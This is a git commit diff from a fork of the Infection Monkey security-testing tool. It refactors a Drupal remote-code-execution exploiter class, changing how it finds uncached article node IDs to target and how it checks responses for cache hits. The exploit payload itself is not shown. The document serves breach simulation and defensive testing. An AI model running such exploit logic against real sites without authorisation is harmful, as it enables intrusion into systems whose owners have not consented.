forked from p15670423/monkey
Merge branch '669/drupal' of https://github.com/guardicore/monkey into 669/drupal
This commit is contained in:
commit
5a00d5e5f9
|
@ -45,7 +45,7 @@ class DrupalExploiter(WebRCE):
|
|||
:return: None (in-place addition)
|
||||
"""
|
||||
for url in potential_urls:
|
||||
node_ids = find_articles(url)
|
||||
node_ids = find_exploitbale_article_ids(url)
|
||||
if node_ids is None:
|
||||
LOG.info('Could not find a Drupal node to attack')
|
||||
continue
|
||||
|
@ -73,7 +73,7 @@ class DrupalExploiter(WebRCE):
|
|||
json=payload,
|
||||
headers={"Content-Type": "application/hal+json"})
|
||||
|
||||
if check_drupal_cache(response):
|
||||
if is_response_cached(response):
|
||||
LOG.info(f'Checking if node {url} is vuln returned cache HIT, ignoring')
|
||||
return False
|
||||
|
||||
|
@ -89,7 +89,7 @@ class DrupalExploiter(WebRCE):
|
|||
|
||||
r = requests.get(f'{url}?_format=hal_json', json=payload, headers={"Content-Type": "application/hal+json"})
|
||||
|
||||
if check_drupal_cache(r):
|
||||
if is_response_cached(r):
|
||||
LOG.info(f'Exploiting {url} returned cache HIT, may have failed')
|
||||
|
||||
if ID_STRING not in r.text:
|
||||
|
@ -108,23 +108,22 @@ class DrupalExploiter(WebRCE):
|
|||
return self.vulnerable_urls.pop()
|
||||
|
||||
|
||||
def check_drupal_cache(r: requests.Response) -> bool:
|
||||
"""
|
||||
Check if a response had the cache header.
|
||||
"""
|
||||
def is_response_cached(r: requests.Response) -> bool:
|
||||
""" Check if a response had the cache header. """
|
||||
return 'X-Drupal-Cache' in r.headers and r.headers['X-Drupal-Cache'] == 'HIT'
|
||||
|
||||
|
||||
def find_articles(base_url: str, lower: int = 1, upper: int = 10):
|
||||
""" Find a target article that does not 404 and is not cached """
|
||||
def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 10) -> set:
|
||||
""" Find target articles that do not 404 and are not cached """
|
||||
articles = set()
|
||||
while lower < upper:
|
||||
u = urljoin(base_url, str(lower))
|
||||
r = requests.get(u)
|
||||
if r.status_code == 200: # found an article
|
||||
node_url = urljoin(base_url, str(lower))
|
||||
response = requests.get(node_url)
|
||||
if response.status_code == 200:
|
||||
if is_response_cached(response):
|
||||
LOG.info(f'Found a cached article at: {node_url}, skipping')
|
||||
else:
|
||||
articles.add(lower)
|
||||
if check_drupal_cache(r):
|
||||
LOG.info(f'Found a cached article at: {lower}, skipping')
|
||||
lower += 1
|
||||
return articles
|
||||
|
||||
|
|
Loading…
Reference in New Issue